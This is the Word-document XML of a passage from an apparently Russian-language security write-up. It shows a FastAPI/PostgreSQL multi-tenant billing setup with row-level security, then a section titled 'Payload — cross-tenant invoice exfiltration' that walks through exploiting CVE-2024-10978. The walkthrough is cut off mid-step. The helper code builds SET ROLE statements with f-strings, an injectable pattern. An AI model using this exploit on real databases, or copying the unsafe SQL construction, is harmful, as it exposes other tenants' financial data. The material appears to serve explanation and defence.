    <w:p w14:paraId="0DA0E684" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B81899" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@asynccontextmanager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6194A871" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def tenant_session(tenant_role: str, tenant_id: int):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0EED37" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """Connection с SET ROLE для конкретного tenant"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAF1B9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    async with async_session_factory() as session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC33E8F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        await session.execute(text(f"SET ROLE {tenant_role}"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F43DCB3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        await session.execute(text(f"SET app.tenant_id = '{tenant_id}'"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29769652" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457192B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            yield session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311668E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C3010B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            await session.execute(text("RESET ROLE"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0BD365" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            await session.execute(text("RESET app.tenant_id"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB99FB5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/billing.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F30D0AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/invoices/recent")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC2424E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def get_recent_invoices(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7692C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_role: str = Depends(get_tenant_role_from_jwt),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EA0ACD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_id: int = Depends(get_tenant_id_from_jwt),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AD35E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F91005" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    async with tenant_session(tenant_role, tenant_id) as session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE85F63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        # Стандартный SELECT с RLS-фильтрацией</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A0556B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        result = await session.execute(text("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF9DED5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            SELECT id, amount, paid_at, description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE67FFA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            FROM billing.invoices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C85132" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            WHERE paid_at &gt; now() - interval '30 days'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DFA78E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            ORDER BY paid_at DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2BDBDC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            LIMIT 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9E68A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        """))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B20BCEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return [dict(r._mapping) for r in result]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FCEB7F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Setup БД (как в 3.17.1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE35CB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER TABLE billing.invoices ENABLE ROW LEVEL SECURITY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436818B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CREATE POLICY tenant_invoices ON billing.invoices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B890E95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING (tenant_id = current_setting('app.tenant_id')::int);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24012566" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B048787" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Роль application_user — общая, через SET ROLE переключается в tenant_X:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D03F33" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE application_user LOGIN PASSWORD '...';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B157CB6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE tenant_42 NOINHERIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325E559E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE tenant_99 NOINHERIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68075FD8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT tenant_42 TO application_user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF4CC50" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT tenant_99 TO application_user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334F1A04" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT SELECT ON billing.invoices TO tenant_42, tenant_99;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA5D627" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connection pool reuses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>application_user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> connection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE tenant_X</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> переключает effective role per-request. CVE-2024-10978 — баг в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reset path этого переключения</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01159A0C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — cross-tenant invoice exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C365D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакующий-tenant 42 делает первый запрос:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4727051B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /invoices/recent (JWT tenant_42)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFBC8E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connection C: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE tenant_42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET app.tenant_id = '42'</w:t>
      </w:r>
      <w:r>
        <w:t>. PostgreSQL планирует и кэширует SELECT с RLS-фильтром для tenant_42. Response: 50 invoices tenant 42.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C56C086" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RESET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — connection возвращается в pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0724AB86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — другой пользователь-tenant 99 делает запрос:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D4FB2A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /invoices/recent (JWT tenant_99)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B438AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connection pool выдаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>тот же connection C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (или другой). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE tenant_99</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET app.tenant_id = '99'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>В уязвимом PG</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2024-10978 баг в reset path сохраняет неверный role/user-id в plan-cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EF0417" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
